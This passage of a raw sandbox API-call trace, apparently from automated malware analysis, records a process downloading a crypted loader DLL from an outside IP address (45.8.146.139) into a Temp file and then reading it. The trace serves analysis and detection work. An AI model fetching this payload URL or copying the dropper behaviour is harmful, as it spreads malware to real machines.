Flags=0x0, Size=0x2) returned 0xcb27d28 [0125.007] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0xcb27d28 | out: hHeap=0x440000) returned 1 [0125.007] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x2) returned 0xcb27cf8 [0125.007] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x8) returned 0xcb27ca8 [0125.007] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x18) returned 0xc83e500 [0125.007] GetLastError () returned 0x0 [0125.007] SetLastError (dwErrCode=0x0) [0125.007] GetLastError () returned 0x0 [0125.007] SetLastError (dwErrCode=0x0) [0125.008] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xb8) returned 0xb3f7f70 [0125.008] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x6a6) returned 0xcb75f58 [0125.008] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0xcb75f58 | out: hHeap=0x440000) returned 1 [0125.008] GetLastError () returned 0x0 [0125.008] SetLastError (dwErrCode=0x0) [0125.008] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x6) returned 0xcb27bd8 [0125.008] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x2) returned 0xcb27c08 [0125.008] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x4) returned 0xcb27b88 [0125.008] GetLastError () returned 0x0 [0125.008] SetLastError (dwErrCode=0x0) [0125.008] GetLastError () returned 0x0 [0125.008] SetLastError (dwErrCode=0x0) [0125.008] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xb8) returned 0xb3f8c30 [0125.008] GetLastError () returned 0x0 [0125.008] SetLastError (dwErrCode=0x0) [0125.009] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x6a6) returned 0xcb75f58 [0125.009] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0xcb75f58 | out: hHeap=0x440000) returned 1 [0125.009] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0xcb27bd8 | out: hHeap=0x440000) returned 1 [0125.009] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0xb3f7f70 | out: hHeap=0x440000) returned 1 [0125.009] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0xcb27b88 | out: hHeap=0x440000) returned 1 [0125.009] GetLastError () returned 0x0 [0125.009] SetLastError (dwErrCode=0x0) [0125.009] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x6) returned 0xcb27bf8 [0125.009] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x2) returned 0xcb27c58 [0125.009] GetLastError () returned 0x0 [0125.009] SetLastError (dwErrCode=0x0) [0125.009] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x200) returned 0xc897fc0 [0125.009] GetLastError () returned 0x0 [0125.009] SetLastError (dwErrCode=0x0) [0125.009] GetLastError () returned 0x0 [0125.009] SetLastError (dwErrCode=0x0) [0125.009] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x4) returned 0xcb27c18 [0125.009] GetLastError () returned 0x0 [0125.010] SetLastError (dwErrCode=0x0) [0125.010] GetLastError () returned 0x0 [0125.010] SetLastError (dwErrCode=0x0) [0125.010] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xb8) returned 0xb3f7bb0 [0125.010] GetLastError () returned 0x0 [0125.010] SetLastError (dwErrCode=0x0) [0125.010] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x6a6) returned 0xcb75f58 [0125.010] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0xcb75f58 | out: hHeap=0x440000) returned 1 [0125.010] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0xcb27bf8 | out: hHeap=0x440000) returned 1 [0125.010] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0xb3f8c30 | out: hHeap=0x440000) returned 1 [0125.010] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0xcb27c18 | out: hHeap=0x440000) returned 1 [0125.010] GetLastError () returned 0x0 [0125.010] SetLastError (dwErrCode=0x0) [0125.010] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x6) returned 0xcb27b98 [0125.010] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0xcb27c58 | out: hHeap=0x440000) returned 1 [0125.010] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0xcb27c08 | out: hHeap=0x440000) returned 1 [0125.011] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x8) returned 0xcb27d28 [0125.011] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x50) returned 0xcad21f8 [0125.011] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x40) returned 0xcb2a0b0 [0125.011] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x40) returned 0xcb2a848 [0125.011] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x40) returned 0xcb2ae78 [0125.011] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x70) returned 0xca15938 [0125.011] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0xca15938 | out: hHeap=0x440000) returned 1 [0125.011] LocalAlloc (uFlags=0x40, uBytes=0x1000) returned 0xca78158 [0125.012] GetLocalTime (in: lpSystemTime=0x197574 | out: lpSystemTime=0x197574*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x4, wDay=0xb, wHour=0x13, wMinute=0x4, wSecond=0x2, wMilliseconds=0x106)) [0125.012] wsprintfA (in: param_1=0xca78158, param_2="%02u:%02u:%02u " | out: param_1="19:04:02 ") returned 9 [0125.012] wsprintfA (in: param_1=0xca78161, param_2="Starting download\n" | out: param_1="Starting download\n") returned 18 [0125.012] OutputDebugStringA (lpOutputString="19:04:02 Starting download\n") [0125.014] LocalFree (hMem=0xca78158) returned 0x0 [0125.014] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1033) returned 0xf593610 [0125.015] GetTempPathA (in: nBufferLength=0x1000, lpBuffer=0xf593620 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0125.016] GetTempFileNameA (in: lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpPrefixString="y", uUnique=0x0, lpTempFileName=0xf593620 | out: lpTempFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yED9.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\yed9.tmp")) returned 0xed9 [0125.070] DeleteFileA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yED9.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\yed9.tmp")) returned 1 [0125.071] LocalAlloc (uFlags=0x40, uBytes=0x1000) returned 0xca74138 [0125.071] GetLocalTime (in: lpSystemTime=0x1975d8 | out: lpSystemTime=0x1975d8*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x4, wDay=0xb, wHour=0x13, wMinute=0x4, wSecond=0x2, wMilliseconds=0x144)) [0125.071] wsprintfA (in: param_1=0xca74138, param_2="%02u:%02u:%02u " | out: param_1="19:04:02 ") returned 9 [0125.071] wsprintfA (in: param_1=0xca74141, param_2="Starting download from %s to %s\n" | out: param_1="Starting download from http://45.8.146.139/fhfty/VM5POCOCOOAIQE2L88BA4UIKO2LNACQ5/loader_p3_dll_64_n5_crypt_x64_asm_clone_n20.dll to C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yED9.tmp.dll\n") returned 183 [0125.071] OutputDebugStringA (lpOutputString="19:04:02 Starting download from http://45.8.146.139/fhfty/VM5POCOCOOAIQE2L88BA4UIKO2LNACQ5/loader_p3_dll_64_n5_crypt_x64_asm_clone_n20.dll to C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yED9.tmp.dll\n") [0125.072] LocalFree (hMem=0xca74138) returned 0x0 [0125.072] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x717a0000 [0125.134] URLDownloadToFileA (param_1=0x0, param_2="http://45.8.146.139/fhfty/VM5POCOCOOAIQE2L88BA4UIKO2LNACQ5/loader_p3_dll_64_n5_crypt_x64_asm_clone_n20.dll", param_3="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yED9.tmp.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\yed9.tmp.dll"), param_4=0x0, param_5=0x0) returned 0x0 [0129.428] LocalAlloc (uFlags=0x40, uBytes=0x1000) returned 0xca7a168 [0129.428] GetLocalTime (in: lpSystemTime=0x1975c8 | out: lpSystemTime=0x1975c8*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x4, wDay=0xb, wHour=0x13, wMinute=0x4, wSecond=0x6, wMilliseconds=0x2ab)) [0129.429] wsprintfA (in: param_1=0xca7a168, param_2="%02u:%02u:%02u " | out: param_1="19:04:06 ") returned 9 [0129.429] GetLastError () returned 0x0 [0129.430] FormatMessageA (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x19700c, nSize=0x0, Arguments=0x0 | out: lpBuffer="`e\x84\x0c") returned 0x27 [0129.430] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x30) returned 0xcb16ff8 [0129.431] LocalFree (hMem=0xc846560) returned 0x0 [0129.431] GetLastError () returned 0x0 [0129.431] wsprintfA (in: param_1=0xca7a171, param_2="Finished download from %s to %s: %d %s\n" | out: param_1="Finished download from http://45.8.146.139/fhfty/VM5POCOCOOAIQE2L88BA4UIKO2LNACQ5/loader_p3_dll_64_n5_crypt_x64_asm_clone_n20.dll to C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yED9.tmp.dll: 0 Error#0:The operation completed successfully.\r\n\n") returned 234 [0129.431] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0xcb16ff8 | out: hHeap=0x440000) returned 1 [0129.431] OutputDebugStringA (lpOutputString="19:04:06 Finished download from http://45.8.146.139/fhfty/VM5POCOCOOAIQE2L88BA4UIKO2LNACQ5/loader_p3_dll_64_n5_crypt_x64_asm_clone_n20.dll to C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yED9.tmp.dll: 0 Error#0:The operation completed successfully.\r\n\n") [0129.432] LocalFree (hMem=0xca7a168) returned 0x0 [0129.432] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x40) returned 0xcb2b190 [0129.432] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x38) returned 0xcb09f60 [0129.432] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x76720000 [0129.434] GetProcAddress (hModule=0x76720000, lpProcName="AreFileApisANSI") returned 0x7673f300 [0129.434] AreFileApisANSI () returned 1 [0129.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb2b190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0129.434] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0xcb06928 [0129.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb2b190, cbMultiByte=-1, lpWideCharStr=0xcb06928, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yED9.tmp.dll") returned 50 [0129.434] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yED9.tmp.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\yed9.tmp.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x196ea4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd90 [0129.434] GetFileType (hFile=0xd90) returned 0x1 [0129.434] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0xcb06928 | out: hHeap=0x440000) returned 1 [0129.435] CloseHandle (hObject=0xd90) returned 1 [0129.435] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0xcb2b190 | out: hHeap=0x440000) returned 1 [0129.435] AreFileApisANSI () returned 1 [0129.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf593620, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0129.435] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0xcb066f8 [0129.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf593620, cbMultiByte=-1, lpWideCharStr=0xcb066f8, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yED9.tmp.dll") returned 50 [0129.435] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yED9.tmp.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\yed9.tmp.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x196ecc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd90 [0129.436] GetFileType (hFile=0xd90) returned 0x1 [0129.436] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0xcb066f8 | out: hHeap=0x440000) returned 1 [0129.436] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1000) returned 0xca77150 [0129.436] ReadFile (in: hFile=0xd90, lpBuffer=0xca77150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x196efc, lpOverlapped=0x0 | out: lpBuffer=0xca77150*, lpNumberOfBytesRead=0x196efc*=0xf6, lpOverlapped=0x0) returned 1 [0129.436] ReadFile (in: hFile=0xd90, lpBuffer=0xca77150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x196efc, lpOverlapped=0x0 | out: lpBuffer=0xca77150*, lpNumberOfBytesRead=0x196efc*=0x0, lpOverlapped=0x0) returned 1 [0129.436] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0xca77150 | out: hHeap=0x440000) returned 1 [0129.436] CloseHandle (hObject=0xd90) returned 1 [0129.438] GetLastError () returned 0x0 [0129.438] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x769bf350 [0129.438] SetLastError (dwErrCode=0x0) [0129.439] GetLastError () returned 0x0 [0129.439] SetLastError (dwErrCode=0x0) [0129.445] GetLastError () returned 0x0 [0129.445] SetLastError (dwErrCode=0x0) [0129.445] GetLastError () returned 0x0 [0129.445] SetLastError (dwErrCode=0x0) [0129.466] Sleep (dwMilliseconds=0x0) [0129.506] GetAsyncKeyState (vKey=3) returned 0 [0129.506] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0129.506] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0129.506] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0129.506] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0129.506] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0129.506] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0129.507] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0129.507] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0129.507] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0129.507] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0129.507] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x1 [0129.507] GetLocalTime (in: lpSystemTime=0x197b4c | out: lpSystemTime=0x197b4c*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x4, wDay=0xb, wHour=0x13, wMinute=0x4, wSecond=0x6, wMilliseconds=0x2f9)) [0129.508] Sleep (dwMilliseconds=0x0) [0129.518] SetErrorMode (uMode=0x8001) returned 0x8001 [0129.518] _stricmp (_Str1="user32", _Str2="VBE6.DLL") returned -1 [0129.518] LoadLibraryA (lpLibFileName="user32") returned 0x743d0000 [0129.520] SetErrorMode (uMode=0x8001) returned 0x8001 [0129.520] GetProcAddress (hModule=0x743d0000, lpProcName="KillTimer") returned 0x74408aa0 [0129.520] KillTimer (hWnd=0x0, uIDEvent=0x7f6f) returned 1 [0129.520] GetLastError () returned 0x0 [0129.525] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x2 [0129.525] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x2 [0129.525] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x2 [0129.525] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x1 [0129.526] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0129.526] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0129.526] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0129.526] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0129.526] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x1 [0129.526] CreateBindCtx (in: reserved=0x0, ppbc=0x197808 | out: ppbc=0x197808*=0xcb0a060) returned 0x0 [0129.527] MkParseDisplayName (in: pbc=0xcb0a060, szUserName="new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B", pchEaten=0x19780c, ppmk=0x197810 | out: pchEaten=0x19780c, ppmk=0x197810*=0xcb0a1a0) returned 0x0 [0129.529] IUnknown:Release (This=0xcb0a060) returned 0x0 [0129.529] BindMoniker (in: pmk=0xcb0a1a0, grfOpt=0x0, iidResult=0x697e8088*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvResult=0x197804 | out: ppvResult=0x197804*=0x8cec364) returned 0x0 [0129.529] IUnknown:Release (This=0xcb0a1a0) returned 0x0 [0129.577] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x197bac | out: ppsaOut=0x197bac) returned 0x0 [0129.577] SafeArrayAllocData (psa=0xc8468d0) returned 0x0 [0129.588] SafeArrayDestroyData (psa=0xc8468d0) returned 0x0 [0129.588] SafeArrayDestroyDescriptor (psa=0xc8468d0) returned 0x0 [0129.596] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x2 [0129.596] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x2 [0129.596] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x2 [0129.596] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x1 [0129.803] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0129.803] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0129.803] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0129.803] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0129.803] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x1 [0129.803] CreateBindCtx (in: reserved=0x0, ppbc=0x197808 | out: ppbc=0x197808*=0xcb0a420) returned 0x0 [0129.804] MkParseDisplayName (in: pbc=0xcb0a420, szUserName="new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B", pchEaten=0x19780c, ppmk=0x197810 | out: pchEaten=0x19780c, ppmk=0x197810*=0xcb0a3a0) returned 0x0 [0129.804] IUnknown:Release (This=0xcb0a420) returned 0x0 [0129.804] BindMoniker (in: pmk=0xcb0a3a0, grfOpt=0x0, iidResult=0x697e8088*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvResult=0x197804 | out: ppvResult=0x197804*=0x8cec4e4) returned 0x0 [0129.805] IUnknown:Release (This=0xcb0a3a0) returned 0x0 [0129.807] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x197bac | out: ppsaOut=0x197bac) returned 0x0 [0129.807] SafeArrayAllocData (psa=0xc8468d0) returned 0x0 [0129.812] SafeArrayDestroyData (psa=0xc8468d0) returned 0x0 [0129.812] SafeArrayDestroyDescriptor (psa=0xc8468d0) returned 0x0 [0129.832] SafeArrayDestroyData (psa=0xc845220) returned 0x0 [0129.841] SafeArrayAllocData (psa=0xc845220) returned 0x0 [0129.841] SafeArrayDestroyData (psa=0xc845220) returned 0x0 [0129.841] SafeArrayDestroyDescriptor (psa=0xc845220) returned 0x0 Thread: id = 16 os_tid = 0x1360 Thread: id = 17 os_tid = 0x13e0 Thread: id = 18 os_tid = 0x13e8 Thread: id = 19 os_tid = 0x13fc Thread: id = 20 os_tid = 0x66c